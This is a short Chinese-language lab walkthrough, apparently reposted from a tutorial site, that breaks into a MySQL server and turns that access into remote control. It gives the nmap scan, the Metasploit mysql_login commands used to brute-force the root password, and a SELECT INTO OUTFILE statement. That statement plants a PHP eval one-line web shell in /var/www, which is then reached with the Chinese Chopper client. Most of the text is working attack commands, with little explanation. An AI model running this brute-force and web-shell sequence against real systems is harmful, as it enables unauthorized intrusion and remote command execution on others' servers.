一、信息收集
利用nmap工具掃描靶機3306端口開啟情況
nmap -sV 192.168.180.133 -p 3306

發(fā)現(xiàn)靶機開啟3306端口,MySQL數(shù)據(jù)庫
二、滲透測試
打開msfconsole滲透測試平臺

搜索mysql_login漏洞模塊
search mysql_login

使用auxiliary/scanner/mysql/mysql_login漏洞攻擊模塊
use 0

查看需要配置的參數(shù)
show options

設置密碼字典
set pass_file /pass.txt

設置目標IP
set rhosts 192.168.180.133

設置爆破用戶名
set username root

運行
exploit

成功爆破出密碼 P@sswrd
三、遠程登錄
使用我們爆破出的用戶名密碼遠程登錄MySQL數(shù)據(jù)庫
mysql -h 192.168.180.133 -u root -p

登錄成功后寫入一句話木馬到/var/www目錄中
select '<?php @eval($_POST[pass]);?>' into outfile '/var/www/shell.php';

寫入成功后使用中國菜刀連接

雙擊進入

連接成功,可看到系統(tǒng)文件及信息
右擊也可以打開虛擬終端,執(zhí)行命令文章來源:http://www.zghlxwxcb.cn/news/detail-728238.html


實驗結(jié)束文章來源地址http://www.zghlxwxcb.cn/news/detail-728238.html
到了這里,關于利用MySQL暴力破解實現(xiàn)遠程控制的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!